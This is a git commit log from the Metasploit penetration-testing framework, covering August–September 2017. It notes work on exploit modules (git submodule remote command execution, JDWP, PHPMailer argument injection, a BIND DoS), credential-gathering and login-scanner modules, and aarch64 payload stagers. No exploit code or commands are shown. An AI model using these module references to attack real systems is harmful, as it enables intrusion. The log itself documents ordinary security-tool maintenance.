2017-09-04 20:57:23 -04:00
Pearce Barry
6051a1a1c1
Land #8910 , Use meta redirect instead of JS redirect in 2 modules
2017-09-01 13:50:02 -05:00
Tod Beardsley
86db2a5771
Land #8888 from @h00die, with two extra fixes
...
Fixes spelling and grammar in a bunch of modules. More to come!
2017-08-31 14:37:02 -05:00
Tod Beardsley
8a045e65aa
Spaces between commas
2017-08-31 14:29:23 -05:00
Tod Beardsley
642a13e820
Out out damn tick
2017-08-31 14:29:05 -05:00
Tim
86ee77ffb0
add aarch64 nops and fix aarch64 cmdstager
2017-08-31 18:48:58 +08:00
Adam Cammack
195c1e041f
Update payload specs and sizes
...
Adds the new Aarch64 and R payloads
fix merge
2017-08-31 18:48:56 +08:00
Tim
7b71f60ea1
fix the stack
2017-08-31 18:35:18 +08:00
Tim
26f4fa3b09
setup stack
2017-08-31 18:35:17 +08:00
Tim
a2396991f0
stager not setting up stack
2017-08-31 18:35:17 +08:00
Tim
6dbe00158f
fix stager
2017-08-31 18:35:17 +08:00
james
49173818fd
Addresses #8674
...
This type of redirection will work without javascript being enabled.
Modules:
multi/browser/firefox_xpi_bootstrapped_addon
multi/browser/itms_overflow
More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
2017-08-30 23:16:46 -05:00
Pearce Barry
2bbba9c500
Avoid some ActiveRecord validation errors.
...
Per discussion with @bcoles in [PR 8759](https://github.com/rapid7/metasploit-framework/pull/8759#issuecomment-325028479 ), setting a login data's last_attempted_at value while also setting the status to UNTRIED will cause a validation error when there's a running+connected MSF DB.
This PR removes the handful of existing cases we're doing this (thx, @bcoles!).
2017-08-30 15:31:36 -05:00
Jon Hart
eec5d2ada9
Update description and add link to SIET
2017-08-30 11:52:11 -07:00
Calum Hutton
3b745bd17c
Rework the bash, redirect stdout/err to /dev/null
...
Dont need the -
2017-08-30 03:49:30 +01:00
Calum Hutton
9387a765e5
Fix msftidy warns/errs
2017-08-30 03:10:46 +01:00
Calum Hutton
4934023fa5
Use alternate system() payload, dont worry about restarts
...
Use nohup and & to background the meterpreter process
2017-08-30 03:10:46 +01:00
Calum Hutton
d53f10554d
Configurable restart command
2017-08-30 03:10:46 +01:00
Calum Hutton
d0ff2694b3
Restart after payload process ends
2017-08-30 03:10:46 +01:00
Calum Hutton
aee44e3bd2
Working meterpreter exploit
...
No service restart
2017-08-30 03:10:46 +01:00
Calum Hutton
7cfb5fcc97
Rename
2017-08-30 03:10:46 +01:00
Calum Hutton
8b67b710fa
Add template
2017-08-30 03:10:46 +01:00
Brent Cook
202c936868
Land #8826 , git submodule remote command execution
2017-08-29 18:11:32 -05:00
Brent Cook
46eeb1bee0
update style
2017-08-29 17:44:39 -05:00
Pearce Barry
d5124fdc94
Land #8759 , Add TeamTalk Gather Credentials auxiliary module
2017-08-29 13:17:28 -05:00
Tim
39299c0fb8
randomize submodule path
2017-08-29 16:54:08 +08:00
Brendan Coles
c9e32fbb18
Remove last_attempted_at
2017-08-29 05:05:04 +00:00
h00die
a40429158f
40% done
2017-08-28 20:17:58 -04:00
Brent Cook
1e8edb377f
Land #8873 , cleanup enable_rdp, add error handling
2017-08-28 05:50:42 -05:00
Brent Cook
582b2e238e
update mettle payload to 0.2.2, add background and single-thread http comms
2017-08-28 05:31:44 -05:00
Brent Cook
15ec40f5c6
update R cached sizes
2017-08-28 05:31:42 -05:00
h00die
bd7ea1f90d
more updates, 465 more pages to go
2017-08-26 21:01:10 -04:00
james
7dfde651ea
Add login scanner module for Inedo BuildMaster
...
This module attempts to log into BuildMaster. BuildMaster is an application release automation tool.
More information about BuildMaster:
http://inedo.com/
2017-08-26 17:56:53 -05:00
Erik Lenoir
a8067070f2
Fix typo
2017-08-26 17:52:11 +02:00
William Vu
924c3de9f3
Land #7382 , BIND TSIG DoS
2017-08-26 10:42:35 -05:00
William Vu
f9a2c3406f
Clean up module
2017-08-26 10:41:10 -05:00
h00die
3420633f29
@NickTyrer corrected my correction
2017-08-26 08:43:10 -04:00
Erik Lenoir
801e3e2d68
Replace REXML with Nokogiri and try to cross id with mirror/repository tag
2017-08-25 18:28:09 +02:00
Jon P
abaf80f3df
jmartin improvements (iter on keys + save as credentials)
2017-08-25 18:15:24 +02:00
h00die
32a4436ecd
first round of spelling/grammar fixes
2017-08-24 21:38:44 -04:00
n00py
8f17d536a7
Update phpmailer_arg_injection.rb
...
Removed second parameter as it was not necessary. Only changed needed was to change "send_request_cgi" to "send_request_cgi!"
2017-08-24 00:29:28 -06:00
n00py
c49b72a470
Follow 301 re-direct
...
I found that in some cases, the trigger URL cannot be accessed directly. For example, if the uploaded file was example.php, browsing to "example.php" would hit a 301 re-direct to "/example". It isn't until hitting "/example" that the php is executed. This small change will just allow the trigger to follow one 301 redirect.
2017-08-23 18:53:54 -06:00
Brent Cook
821121d40b
Land #8871 , improve compatibility and speed of JDWP exploit
2017-08-23 18:53:47 -05:00
Jeffrey Martin
cba4d36df2
provide missing bits for R platform
2017-08-23 16:58:48 -05:00